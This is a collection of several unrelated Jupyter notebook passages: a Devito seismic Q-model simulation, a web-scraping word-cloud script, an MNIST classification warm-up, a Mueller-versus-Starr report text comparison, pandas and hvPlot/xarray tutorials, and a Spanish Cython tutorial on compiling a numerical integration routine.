``` # NBVAL_IGNORE_OUTPUT op.arguments() ``` ## Print the generated c code for review We use ```print(op)``` to output the generated c code for review. ``` # NBVAL_IGNORE_OUTPUT print(op) ``` ## Run the operator for the Q=25 and Q=100 models By setting Devito logging ```configuration['log-level'] = 'DEBUG'``` we have enabled output of statistics related to the performance of the operator, which you will see below when the operator runs. We will run the Operator once with the Q model as defined ```wOverQ_025```, and then run a second time passing the ```wOverQ_100``` Q model. For the second run with the different Q model, we take advantage of the ```placeholder design patten``` in the Devito ```Operator```. For more information on this see the [FAQ](https://github.com/devitocodes/devito/wiki/FAQ#how-are-abstractions-used-in-the-seismic-examples) entry. ``` # NBVAL_IGNORE_OUTPUT # Run the operator for the Q=25 model print("m min/max; %+12.6e %+12.6e" % (np.min(m.data), np.max(m.data))) print("b min/max; %+12.6e %+12.6e" % (np.min(b.data), np.max(b.data))) print("wOverQ_025 min/max; %+12.6e %+12.6e" % (np.min(wOverQ_025.data), np.max(wOverQ_025.data))) print("wOverQ_100 min/max; %+12.6e %+12.6e" % (np.min(wOverQ_100.data), np.max(wOverQ_100.data))) print(time_range) u.data[:] = 0 op(time=time_range.num-1) # summary = op(time=time_range.num-1, h_x=dx, h_z=dz, dt=dt) # Save the Q=25 results and run the Q=100 case import copy uQ25 = copy.copy(u) recQ25 = copy.copy(rec) u.data[:] = 0 op(time=time_range.num-1, wOverQ_025=wOverQ_100) print("Q= 25 receiver data min/max; %+12.6e %+12.6e" %\ (np.min(recQ25.data[:]), np.max(recQ25.data[:]))) print("Q=100 receiver data min/max; %+12.6e %+12.6e" %\ (np.min(rec.data[:]), np.max(rec.data[:]))) # Continuous integration hooks # We ensure the norm of these computed wavefields is repeatable assert np.isclose(norm(uQ25), 26.749, atol=0, rtol=1e-3) assert np.isclose(norm(u), 161.131, atol=0, rtol=1e-3) assert np.isclose(norm(recQ25), 
368.153, atol=0, rtol=1e-3) assert np.isclose(norm(rec), 413.414, atol=0, rtol=1e-3) ``` ## Plot the computed Q=25 and Q=100 wavefields ``` # NBVAL_IGNORE_OUTPUT # Plot the two wavefields, normalized to Q=100 (the larger amplitude) amax_Q25 = 1.0 * np.max(np.abs(uQ25.data[1,:,:])) amax_Q100 = 1.0 * np.max(np.abs(u.data[1,:,:])) print("amax Q= 25; %12.6f" % (amax_Q25)) print("amax Q=100; %12.6f" % (amax_Q100)) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(uQ25.data[1,:,:] / amax_Q100), cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Amplitude') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'black', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Data for $Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(np.transpose(u.data[1,:,:] / amax_Q100), cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Amplitude') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'black', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Data for $Q=100$ model") plt.tight_layout() None ``` ## Plot the computed Q=25 and Q=100 receiver gathers ``` # NBVAL_IGNORE_OUTPUT # Plot the two receiver gathers, normalized to Q=100 (the larger amplitude) amax_Q25 = 0.1 * np.max(np.abs(recQ25.data[:])) amax_Q100 = 0.1 * np.max(np.abs(rec.data[:])) print("amax Q= 25; %12.6f" % (amax_Q25)) print("amax Q=100; %12.6f" % 
(amax_Q100)) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(recQ25.data[:,:] / amax_Q100, cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent, aspect="auto") plt.colorbar(orientation='horizontal', label='Amplitude') plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Receiver gather for $Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(rec.data[:,:] / amax_Q100, cmap="seismic", vmin=-1, vmax=+1, extent=plt_extent, aspect="auto") plt.colorbar(orientation='horizontal', label='Amplitude') plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Receiver gather for $Q=100$ model") plt.tight_layout() None ``` ## Show the output from Devito solving for the stencil Note this takes a **long time** ... about 50 seconds, but obviates the need to solve for the time update expression as we did above. If you would like to see the time update equation as generated by Devito symbolic optimization, uncomment the lines for the solve below. ``` # NBVAL_IGNORE_OUTPUT # Define the partial_differential equation # Note the backward shifted time derivative is obtained via u.dt(x0=t-0.5*t.spacing) pde = (b / m**2) * (wOverQ_100 * u.dt(x0=t-0.5*t.spacing) + u.dt2) -\ (b * u.dx(x0=x+0.5*x.spacing)).dx(x0=x-0.5*x.spacing) -\ (b * u.dz(x0=z+0.5*z.spacing)).dz(x0=z-0.5*z.spacing) # Uncomment the next 5 lines to see the equation as generated by Devito # t1 = timer() # stencil = Eq(u.forward, solve(pde, u.forward)) # t2 = timer() # print("solve ran in %.4f seconds." % (t2-t1)) # stencil ``` ## Discussion This concludes the implementation of the nonlinear forward operator. This series continues in the next notebook that describes the implementation of the Jacobian linearized forward and adjoint operators. 
[sa_02_iso_implementation2.ipynb](sa_02_iso_implementation2.ipynb) ## References - **A nonreflecting boundary condition for discrete acoustic and elastic wave equations** (1985) <br>Charles Cerjan, Dan Kosloff, Ronnie Kosloff, and Moshe Resheq <br> Geophysics, Vol. 50, No. 4 <br>https://library.seg.org/doi/pdfplus/10.1190/segam2016-13878451.1 - **Generation of Finite Difference Formulas on Arbitrarily Spaced Grids** (1988) <br>Bengt Fornberg <br>Mathematics of Computation, Vol. 51, No. 184 <br>http://dx.doi.org/10.1090/S0025-5718-1988-0935077-0 <br>https://web.njit.edu/~jiang/math712/fornberg.pdf - **Self-adjoint, energy-conserving second-order pseudoacoustic systems for VTI and TTI media for reverse time migration and full-waveform inversion** (2016) <br>Kenneth Bube, John Washbourne, Raymond Ergas, and Tamas Nemeth <br>SEG Technical Program Expanded Abstracts <br>https://library.seg.org/doi/10.1190/segam2016-13878451.1
github_jupyter
<font color='green'> <h1> <b> Web Scraping </b> </h1> </font> <br /> <font color='black'> <h3> Working on Textual data to understand the overall conditions related to the company. </h3> </font> ``` import requests import nltk nltk.download('wordnet') from nltk.stem import WordNetLemmatizer from nltk.sentiment.vader import SentimentIntensityAnalyzer from bs4 import BeautifulSoup import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline import random from wordcloud import WordCloud from html.parser import HTMLParser import bs4 as bs import urllib.request import re import string r=requests.get('https://www.stericycle.com/terms-and-conditions') r.encoding = 'utf-8' html = r.text print(html[:500]) soup = BeautifulSoup(html) text = soup.get_text() len(text) text=text[17300:31000] text_nopunct='' text_nopunct= "".join([char for char in text if char not in string.punctuation]) len(text_nopunct) text_nopunct[500:1500] text_nopunct=text_nopunct.strip('\n') text_nopunct=text_nopunct.strip('\n\n') text_nopunct=text_nopunct.strip('\n\n\n') text_nopunct[500:1500] tokenizer = nltk.tokenize.RegexpTokenizer('\w+') tokens = tokenizer.tokenize(text_nopunct) len(tokens) print(tokens[0:20]) words = [] for word in tokens: words.append(word.lower()) print(words[0:50]) stopwords = nltk.corpus.stopwords.words('english') words_new = [] for word in words: if word not in stopwords: words_new.append(word) len(words_new) from nltk.stem import WordNetLemmatizer wn = WordNetLemmatizer() lem_words=[] for word in words_new: word=wn.lemmatize(word) lem_words.append(word) len(lem_words) same=0 diff=0 for i in range(0,161): if(lem_words[i]==words_new[i]): same=same+1 elif(lem_words[i]!=words_new[i]): diff=diff+1 print('Number of words Lemmatized=', diff) print('Number of words not Lemmatized=', same) #The frequency distribution of the words freq_dist = nltk.FreqDist(lem_words) #Frequency Distribution Plot plt.subplots(figsize=(10,6)) 
freq_dist.plot(30) #converting into string res=' '.join([i for i in lem_words if not i.isdigit()]) plt.subplots(figsize=(12,8)) wordcloud = WordCloud( background_color='red', max_words=80, width=1000, height=800 ).generate(res) plt.imshow(wordcloud) plt.title('Stericycle (100 words)') plt.axis('off') plt.show() plt.subplots(figsize=(12,8)) wordcloud = WordCloud( background_color='red', max_words=120, width=1000, height=800 ).generate(res) plt.imshow(wordcloud) plt.title('Stericycle (200 words)') plt.axis('off') plt.show() ```
github_jupyter
## Image Classification Problems - Warm-Up In the following set of tutorials, we will focus on a particular class of problems, namely supervised classification, as a typical example for machine learning application use cases. Generally, in classification the task is to assign data items to a fixed set of categories, or in other words classes. While this might sound like an easy task for trivial problems such as deciding if someone is of legal age given their birthday, other classification problems are much harder. Consider for example the problem of identifying in a gray-scale satellite image, what land-cover type, e.g. road, house, field, etc., one can see. There are a number of challenges involved in this problem, objects may have different shapes, might be partially covered by cloud shadows or simply have varying colors. Writing a rule-based algorithm for such a problem is close to impossible. Therefore, we would want to employ a data-driven approach instead and stochastically infer reasonable respresentations for each data-item and class from manually annotated examples (the supervisor). This approach is so flexible that it can be mapped to a large number of application scenarios by providing input data with its corresponding encoded pattern labels (i.e. the annotations). As part of this tutorial, we will study one examplery use case - image classification. For a number of images, we will predict, what object is depicted in it. For teaching purposes, we will use the battle-test MNIST database [1]. It contains 70.000 images with 28x28 pixels of hand-written digits, collected by US-American National Institute of Standard and Technology. The classification task is to decide what digit can be seen in each of these images. You should notice throughout the tutorial session that the presented approaches can be easily transferred to other application domains, like for example the initially presented satellite image scenario. 
def load_data(path='mnist.h5'):
    """
    Read a dataset and its supervisor labels from an HDF5 file.

    The file is expected to store the images under the HDF5 dataset
    '/data' and the corresponding labels under '/labels'.

    Parameters
    ----------
    path : str, optional
        Absolute or relative path of the HDF5 file, defaults to mnist.h5.

    Returns
    -------
    data_and_labels : tuple(np.array[samples, width, height], np.array[samples])
        Two numpy arrays holding the images and their labels.
    """
    with h5py.File(path, 'r') as h5_file:
        images = np.array(h5_file['/data'])
        targets = np.array(h5_file['/labels'])
    return images, targets


def show_examples(data, width=10, height=6):
    """
    Display a number of example images from a given dataset.

    The images are arranged in a rectangular grid with a specified
    width and height, filled row by row in dataset order.

    Parameters
    ----------
    data : np.array[samples, width, height]
        The dataset containing the images.
    width : int, optional
        How wide the rectangular image grid shall be, defaults to ten.
    height : int, optional
        How high the rectangular image grid shall be, defaults to six.
    """
    figure, axes = plt.subplots(height, width, figsize=(16, 9),
                                sharex=True, sharey=True)
    # Walk the grid in row-major order, showing data[0], data[1], ...
    for index in range(width * height):
        row, column = divmod(index, width)
        axis = axes[row][column]
        axis.grid(False)
        axis.imshow(data[index], cmap='gist_gray')
    plt.show()
def count_digits(labels):
    """
    Count how often each individual label, i.e. each digit, occurs.

    Parameters
    ----------
    labels : np.array[samples]
        The labels for each data item.

    Returns
    -------
    counts : dict[unique_classes -> int]
        A mapping between each label value and its absolute occurrence count.
    """
    return dict(enumerate(np.bincount(labels)))


def average_images(data, labels):
    """
    Average all the data items that are of the same class and return the
    resulting 'mean items'.

    Parameters
    ----------
    data : np.array[samples, width, height]
        The dataset containing the images.
    labels : np.array[samples]
        The corresponding labels for each data item.

    Returns
    -------
    mean_items : np.array[unique_classes, width, height]
        The 'mean items' for each unique class in the labels, ordered by
        ascending label value.
    """
    # Iterate over the labels actually present instead of assuming the
    # contiguous range 0..k-1; the original produced NaN rows (mean of an
    # empty slice) whenever a class value was missing from `labels`.
    unique_classes = np.unique(labels)
    averages = np.zeros((unique_classes.shape[0], data.shape[1], data.shape[2],))
    for row, digit in enumerate(unique_classes):
        averages[row] = data[labels == digit].mean(axis=0)
    return averages
github_jupyter
``` # Starr Report copied from # https://www.washingtonpost.com/wp-srv/politics/special/clinton/icreport/srprintable.htm !ls import pdfminer import re import scattertext as st import pandas as pd from pdfminer import pdfparser parser = pdfparser.PDFParser(open('mueller-report.pdf', 'rb')) #From http://stanford.edu/~mgorkove/cgi-bin/rpython_tutorials/Using%20Python%20to%20Convert%20PDFs%20to%20Text%20Files.php from io import StringIO from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.converter import TextConverter from pdfminer.layout import LAParams from pdfminer.pdfpage import PDFPage import os import sys, getopt #converts pdf, returns its text content as a string def convert(fname, pages=None): if not pages: pagenums = set() else: pagenums = set(pages) output = StringIO() manager = PDFResourceManager() converter = TextConverter(manager, output, laparams=LAParams()) interpreter = PDFPageInterpreter(manager, converter) infile = open(fname, 'rb') for page in PDFPage.get_pages(infile, pagenums): interpreter.process_page(page) infile.close() converter.close() text = output.getvalue() output.close return text mueller_report_raw_text = convert('mueller-report.pdf') open('mueller_report.txt', 'w').write(mueller_report_raw_text) starr_report_raw = open('starr_report.txt').read() def is_proper_paragraph(paragraph): return len(paragraph) > 200 and not re.match('^\d', paragraph) and '...................' 
not in paragraph mueller_paragraphs = [paragraph.strip() for paragraph in mueller_report_raw_text.split('\n\n') if is_proper_paragraph(paragraph)] mueller_df = pd.DataFrame({'text': mueller_paragraphs}) mueller_df['category'] = 'Mueller' starr_report_paragraphs = [paragraph.strip() for paragraph in starr_report_raw.split('\n\n') if is_proper_paragraph(paragraph)] starr_df = pd.DataFrame({'text': starr_report_paragraphs}) starr_df['category'] = 'Starr' full_df = pd.concat([mueller_df, starr_df]) full_df['parse'] = full_df.text.apply(st.whitespace_nlp_with_sentences) corpus = (st.CorpusFromParsedDocuments(full_df, category_col='category', parsed_col='parse').build().get_unigram_corpus()) term_scorer = st.CohensD(corpus).set_categories('Mueller', ['Starr']) html = st.produce_scattertext_explorer( corpus, category='Mueller', not_category_name='Starr', term_scorer=st.RankDifference(), transform=st.Scalers.dense_rank, use_full_doc=True ) file_name = 'mueller_vs_starr.html' open(file_name, 'wb').write(html.encode('utf-8')) ```
github_jupyter
# Pandas In this tutorial we will learn to work with tables of data with the `pandas` Python package. Pandas is an industry standard analysis package for data science, so it has many features and is actively being updated and supported (full documentation [here](https://pandas.pydata.org/pandas-docs/stable/)). ## Overview Pandas has two main data structures that it uses to store tables of data, the **Series** and the **DataFrame**. - The **Series** represents a single column of data - The **DataFrame** is a collection of **Series** columns that make a table Let's start by exploring the DataFrame in pandas! ``` # Pandas is commonly aliased as pd import pandas as pd ``` ## Creating DataFrames In the `dict` chapter, we saw that dictionaries can be used to represent tables of data. As you may expect, DataFrames can be created directly from dictionaries! ``` # Daily coffee consumption over 4 weeks coffees = { 'Week': ['Sep 2', 'Sep 9', 'Sep 16', 'Sep 23'], 'Monday': [2, 1, 2, 3], 'Tuesday': [1, 2, 1, 2], 'Wednesday': [1, 1, 2, 1], 'Thursday': [1, 2, 1, 2], 'Friday': [1, 1, 3, 3] } df = pd.DataFrame(coffees) print(type(df)) df ``` We can see the column names using the `.columns` attribute. ``` df.columns ``` ## Slicing and Indexing Pandas gives a few ways to find your data in a **DataFrame**. - `[]` raw indexing by *column* like we've seen in `dict` - `.loc[]` **loc**ate *row* by name - `.iloc[]` **loc**ate *row* by numerical **i**ndex Let's try each of these on our coffee DataFrame. ``` df['Monday'] # try locating a row by its week df.loc['Sep 2'] ``` Uh oh, we didn't tell pandas which of the columns to use as our `Index`. The `Index` is an optional unique identifier of a row, like a *name*, *ID*, or in our case, the *week*. Let's add an `Index` to our DataFrame. ``` df = df.set_index('Week') df.head() ``` Now we can use `.loc[]` to find rows by their Index name! 
``` df.loc['Sep 2'] ``` Finally, we can also specify a row from our DataFrame by its *numerical* index using `.iloc[]`. ``` # Get first row in the DataFrame df.iloc[0] ``` ## DataFrame methods Now let's read in an example dataset to learn about a few other useful DataFrame methods. ``` exoplanets = pd.read_csv("https://github.com/mwaskom/seaborn-data/raw/master/planets.csv") ``` We can check that `pandas` read the table in as a **DataFrame**. ``` type(exoplanets) ``` The `DataFrame.info()` method can tell us about the contents of our table. ``` print(exoplanets.info()) ``` In the above description, we get the total number of rows (the **RangeIndex**), and the number of non-null entries in each of the columns. We can get a sense for what the table looks like by printing the first few rows with the `DataFrame.head(num_rows)` method. You can specify a number of rows to `.head()`, otherwise it shows the first 5 by default. ``` exoplanets.head() ``` Similarly, we can print rows from the bottom of the table with the `.tail(num_rows)` method. Here we are printing the bottom 2 rows. ``` exoplanets.tail(2) ``` ## Null data Dealing with missing data is a major strength of `pandas`. Pandas fills in missing data with a value of `NaN`, but these can be challenging to deal with because many math operations are ambiguous or undefined on `NaN` values. Let's get a map of which values in our DataFrame are missing with `.isnull()`. This will give a DataFrame of `bool` with whether or not each entry is null. Below, we use `.tail()` to just print the last 5 rows. ``` exoplanets.isnull().tail() ``` To get a summary of how many `NaN`s are in each column, we can use the `.sum()` method (recall that `bool` values in Python are equivalent to 0 and 1 and can be summed). ``` exoplanets.isnull().sum() ``` Here we've converted each null entry to `True`, then summed each of the boolean columns. 
Since `False == 0`, we get a count of the `True == 1` (in this case the null valued) entries in each column. To get rid of these null values, we have a few options. Sometimes we want to completely drop all rows with missing data and we can do this with `dropna()`. ``` exo = exoplanets.dropna() exo.info() ``` Now we have 498 rows without missing values remaining. Let's verify this with the sum trick we saw above. ``` exo.isnull().sum() ``` If instead we want to fill the null values with some default value, we can use the `.fillna()` method. ``` exo_filled = exoplanets.fillna(0) exo_filled.tail() exo_filled.isnull().sum() ``` ## And More Often we want to select data from a table on some condition. Say we want all of the rows where the detection method was *microlensing*, we could do: ``` exoplanets[exoplanets['method'] == 'Microlensing'] ``` Say we want all exoplanets detected between 2009 and 2011. We can do this by combining two boolean expressions with a `&`. ``` exoplanets[(exoplanets['year'] >= 2009) & (exoplanets['year'] <= 2011)].info() ``` Pandas also has a useful summary method which gives statistics on each of the columns called `.describe()`. This can be a quick way to see if the mimima, maxima and means of each column are what you expect. ``` exoplanets.describe() ``` Finally, we can plot a dataframe directly with the `.plot()` method. This method uses `pyplot` from `matplotlib` and accepts most of the same arguments that you would pass to `matplotlib.pyplot.plot()`. The conveniece of plotting directly from a DataFrame is being able to specify the names of columns as the x and y axes. ``` exoplanets.plot(kind='scatter', x='mass', y='orbital_period', title='Orbital Period vs Mass') ``` ## Practice We will read in the fuel economy dataset, **mpg** from https://github.com/mwaskom/seaborn-data below. ``` mpg = pd.read_csv("https://github.com/mwaskom/seaborn-data/raw/master/mpg.csv") ``` 1. 
Use the `.info()`, `.describe()`, and `.head()` methods to get acquainted with the dataset - are there null values for any columns? What is the minimum and maximum number of cylinders of cars in the dataset? 2. If any rows have null values, use `.dropna()` to remove those rows 3. Create a new variable, `mpg4` with only the 4-cylinder engine cars 4. Using the 4-cylinder car DataFrame, make a scatter plot of the *mpg* (fuel economy) vs *horsepower* 5. Plot a histogram (you can do this with `.plot(kind='hist')`) of the *mpg* for only the cars whose *origin* is "usa" ``` # Answer the above problems here! ```
github_jupyter
hvPlot provides one API to explore data of many different types. Previous sections have exclusively worked with tabular data stored in pandas (or pandas-like) DataFrames. The other most common type of data are n-dimensional arrays. hvPlot aims to eventually support different array libraries but for now focuses on [xarray](http://xarray.pydata.org/en/stable/). XArray provides a convenient and very powerful wrapper to label the axis and coordinates of multi-dimensional (n-D) arrays. This user guide will cover how to leverage ``xarray`` and ``hvplot`` to visualize and explore data of different dimensionality ranging from simple 1D data, to 2D image-like data, to multi-dimensional cubes of data. For these examples we’ll use the North American air temperature dataset: ``` import xarray as xr import hvplot.xarray # noqa air_ds = xr.tutorial.open_dataset('air_temperature').load() air = air_ds.air air_ds ``` ## 1D Plots Selecting the data at a particular lat/lon coordinate we get a 1D dataset of air temperatures over time: ``` air1d = air.sel(lat=40, lon=285) air1d.hvplot() ``` Notice how the axes are already appropriately labeled, because xarray stores the metadata required. 
We can also further subselect the data and use `*` to overlay plots: ``` air1d_sel = air1d.sel(time='2013-01') air1d_sel.hvplot(color='purple') * air1d_sel.hvplot.scatter(marker='o', color='blue', size=15) air.lat ``` ### Selecting multiple If we select multiple coordinates along one axis and plot a chart type, the data will automatically be split by the coordinate: ``` air.sel(lat=[20, 40, 60], lon=285).hvplot.line() ``` To plot a different relationship we can explicitly request to display the latitude along the y-axis and use the ``by`` keyword to color each longitude (or 'lon') differently (note that this differs from the ``hue`` keyword xarray uses): ``` air.sel(time='2013-02-01 00:00', lon=[280, 285]).hvplot.line(y='lat', by='lon', legend='top_right') ``` ## 2D Plots By default the ``DataArray.hvplot()`` method generates an image if the data is two-dimensional. ``` air2d = air.sel(time='2013-06-01 12:00') air2d.hvplot(width=400) ``` Alternatively we can also plot the same data using the ``contour`` and ``contourf`` methods, which provide a ``levels`` argument to control the number of iso-contours to draw: ``` air2d.hvplot.contour(width=400, levels=20) + air2d.hvplot.contourf(width=400, levels=8) ``` ## n-D Plots If the data has more than two dimensions it will default to a histogram without providing it further hints: ``` air.hvplot() ``` However we can tell it to apply a ``groupby`` along a particular dimension, allowing us to explore the data as images along that dimension with a slider: ``` air.hvplot(groupby='time', width=500) ``` By default, for numeric types you'll get a slider and for non-numeric types you'll get a selector. Use ``widget_type`` and ``widget_location`` to control the look of the widget. To learn more about customizing widget behavior see [Widgets](Widgets.ipynb). 
``` air.hvplot(groupby='time', width=600, widget_type='scrubber', widget_location='bottom') ``` If we pick a different, lower dimensional plot type (such as a 'line') it will automatically apply a groupby over the remaining dimensions: ``` air.hvplot.line(width=600) ``` ## Statistical plots Statistical plots such as histograms, kernel-density estimates, or violin and box-whisker plots aggregate the data across one or more of the coordinate dimensions. For instance, plotting a KDE provides a summary of all the air temperature values but we can, once again, use the ``by`` keyword to view each selected latitude (or 'lat') separately: ``` air.sel(lat=[25, 50, 75]).hvplot.kde('air', by='lat', alpha=0.5) ``` Using the ``by`` keyword we can break down the distribution of the air temperature across one or more variables: ``` air.hvplot.violin('air', by='lat', color='lat', cmap='Category20') ``` ## Rasterizing If you are plotting a large amount of data at once, you can consider using the hvPlot interface to [Datashader](http://datashader.org), which can be enabled simply by setting `rasterize=True`. Note that by declaring that the data should not be grouped by another coordinate variable, i.e. by setting `groupby=[]`, we can plot all the datapoints, showing us the spread of air temperatures in the dataset: ``` air.hvplot.scatter('time', groupby=[], rasterize=True) *\ air.mean(['lat', 'lon']).hvplot.line('time', color='indianred') ``` Here we also overlaid a non-datashaded line plot of the average temperature at each time. If you enable the appropriate hover tool, the overlaid data supports hovering and zooming even in a static export such as on a web server or in an email, while the raw-data plot has been aggregated spatially before it is sent to the browser, and thus it has only the fixed spatial binning available at that time. If you have a live Python process, the raw data will be aggregated each time you pan or zoom, letting you see the entire dataset regardless of size.
github_jupyter
**Notas para contenedor de docker:** Comando de docker para ejecución de la nota de forma local: nota: cambiar `<ruta a mi directorio>` por la ruta de directorio que se desea mapear a `/datos` dentro del contenedor de docker. ``` docker run --rm -v <ruta a mi directorio>:/datos --name jupyterlab_numerical -p 8888:8888 -p 8786:8786 -p 8787:8787 -d palmoreck/jupyterlab_numerical:1.1.0 ``` password para jupyterlab: `qwerty` Detener el contenedor de docker: ``` docker stop jupyterlab_numerical ``` Documentación de la imagen de docker `palmoreck/jupyterlab_numerical:1.1.0` en [liga](https://github.com/palmoreck/dockerfiles/tree/master/jupyterlab/numerical). --- Esta nota utiliza métodos vistos en [1.5.Integracion_numerica](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.5.Integracion_numerica.ipynb) Documentación de [cython](https://cython.org/): * [Basic Tutorial](https://cython.readthedocs.io/en/latest/src/tutorial/cython_tutorial.html) * [Source Files and Compilation](https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html) * [Compiling with a Jupyter Notebook](https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiling-with-a-jupyter-notebook) **La siguiente celda muestra el modo de utilizar el comando magic de `%pip` para instalar paquetes desde jupyterlab.** Ver [liga](https://ipython.readthedocs.io/en/stable/interactive/magics.html#built-in-magic-commands) para magic commands. Instalamos cython: ``` %pip install -q --user cython ``` La siguiente celda reiniciará el kernel de **IPython** para cargar los paquetes instalados en la celda anterior. Dar **Ok** en el mensaje que salga y continuar con el contenido del notebook. 
``` import IPython app = IPython.Application.instance() app.kernel.do_shutdown(True) ``` # Cython y el por qué compilar a código de máquina De las opciones más sencillas que tenemos a nuestra disposición para resolver bottlenecks en nuestro programa es hacer que nuestro código haga menos trabajo. ¿Cómo podemos hacer esto? <- compilando nuestro código a código de máquina para que el código en Python ejecute menos instrucciones. **¿Por qué puede ser lenta la ejecución de un bloque de código en Python (o en algún otro lenguaje tipo intérprete)?** La verificación de tipo de datos (si son `int`, `double` o `string`), los objetos temporales que se crean por tipo de dato (un objeto tipo `int` en Python tiene asociado un objeto de alto nivel con el que interactuamos pero que causa overhead) y las llamadas a funciones de alto nivel (por ejemplo las que ayudan a almacenar al objeto en memoria) son tres de las fuentes que hacen a Python (y a otro lenguaje tipo intérprete como `R` o `Matlab`) lento. También otras fuentes que responden la pregunta son: * Desde el punto de vista de la memoria de la máquina, el número de referencias a un objeto y las copias entre objetos. * No es posible vectorizar un cálculo sin el uso de extensiones (por ejemplo paquetes como `numpy`). Un paquete para resolver lo anterior es Cython que requiere que escribamos en un lenguaje híbrido entre Python y C. Si bien a l@s integrantes de un equipo de desarrollo que no saben C éste cambio reducirá la velocidad de desarrollo, en la práctica si se tiene un bottleneck que no ha podido resolverse con herramientas como el cómputo en paralelo o vectorización, se recomienda utilizar Cython para regiones pequeñas del código y resolver el bottleneck del programa. Cython es un compilador que convierte *type-annotated Python* y *C like* (instrucciones escritas en Python pero en una forma tipo lenguaje C) en un módulo compilado que funciona como una extensión de Python. 
Este módulo puede ser importado como un módulo regular de Python utilizando `import`. Además Cython tiene ya un buen tiempo en la comunidad (2007 aprox.), es altamente usado y es de las herramientas preferidas para código tipo *CPU-bound* (un gran porcentaje del código es uso de CPU vs uso de memoria o I/O). También soporta a la [API OpenMP](https://www.openmp.org/) que veremos en el capítulo de cómputo en paralelo para aprovechar los múltiples cores o CPU's de una máquina. Para ver más historia de Cython ir a la referencia 1. de esta nota o a la [liga](https://en.wikipedia.org/wiki/Cython). # ¿Qué tipo de ganancias en velocidad podemos esperar al usar Cython? * Código en el que se tengan muchos loops (por ejemplo ciclos `for`) en los que se realizan operaciones matemáticas típicamente no vectorizadas o que no pueden vectorizarse*. Esto es, códigos en los que las instrucciones son básicamente sólo Python sin utilizar paquetes externos. Además, si en el ciclo las variables no cambian de su tipo (por ejemplo de `int` a `float`) entonces es una blanco perfecto para ganancia en velocidad al compilar a código de máquina. *Si tu código de Python llama a operaciones vectorizadas vía `numpy` podría ser que no se ejecute más rápido tu código después de compilarlo. * No esperamos tener un *speedup* después de compilar para llamadas a librerías externas (por ejemplo a expresiones regulares, operaciones con `string`s o a una base de datos). Programas que tengan alta carga de I/O también es poco probable que muestren ganancias significativas. En general es poco probable que tu código compilado se ejecute más rápido que un código en C "bien aceitado" y también es poco probable que se ejecute más lento. 
Es muy posible que el código C generado desde tu Python pueda alcanzar las velocidades de un código escrito en C, a menos que la persona que programó en C tenga un gran conocimiento de formas de hacer que el código de C se ajuste a la arquitectura de la máquina sobre la que se ejecutan los códigos. **No olvidar:** es importante fijar de forma aproximada el tiempo objetivo que se desea alcanzar para un código que escribamos. Si bien el perfilamiento y la compilación son herramientas para resolver los bottlenecks, debemos tomar en cuenta el tiempo objetivo fijado y ser práctic@s en el desarrollo, no podemos por siempre estar optimizando nuestro código. # Ejemplo Cython puede utilizarse vía un script `setup.py` que compila un módulo pero también puede utilizarse en `IPython` vía un comando `magic`. ``` import math import time from scipy.integrate import quad ``` ## Vía un script `setup.py` Para este caso requerimos tres archivos: 1) El código escrito en Python que será compilado en un archivo con extensión `.pyx`. 2) Un archivo `setup.py` que contiene las instrucciones para llamar a Cython y cree el módulo compilado. 3) El código escrito en Python que importará el módulo compilado (puede pensarse como nuestro `main`). 1) Función a compilar en un archivo `.pyx`: ``` %%file Rcf_cython.pyx def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. 
Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res ``` 2) Archivo `setup.py` que contiene las instrucciones para el build: ``` %%file setup.py from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext setup(cmdclass = {'build_ext': build_ext}, ext_modules = [Extension("Rcf_compiled", ["Rcf_cython.pyx"])] ) ``` Compilar desde la línea de comandos: ``` %%bash python3 setup.py build_ext --inplace #inplace para compilar el módulo en el directorio #actual ``` **Notas:** * La compilación debe hacerse cada vez que se modifica el código de la función `Rcf` del archivo `Rcf_cython.pyx` o cambia el `setup.py`. * Obsérvese en el directorio donde se encuentra la nota que se generó un archivo `Rcf_cython.c`. 3) Importar módulo compilado y ejecutarlo: ``` f=lambda x: math.exp(-x**2) #using math library import Rcf_compiled n=10**6 start_time = time.time() aprox=Rcf_compiled.Rcf(f,0,1,n) end_time = time.time() aprox secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) ``` **Recuérdese** revisar el error relativo: ``` def err_relativo(aprox, obj): return math.fabs(aprox-obj)/math.fabs(obj) #obsérvese el uso de la librería math obj, err = quad(f, 0, 1) 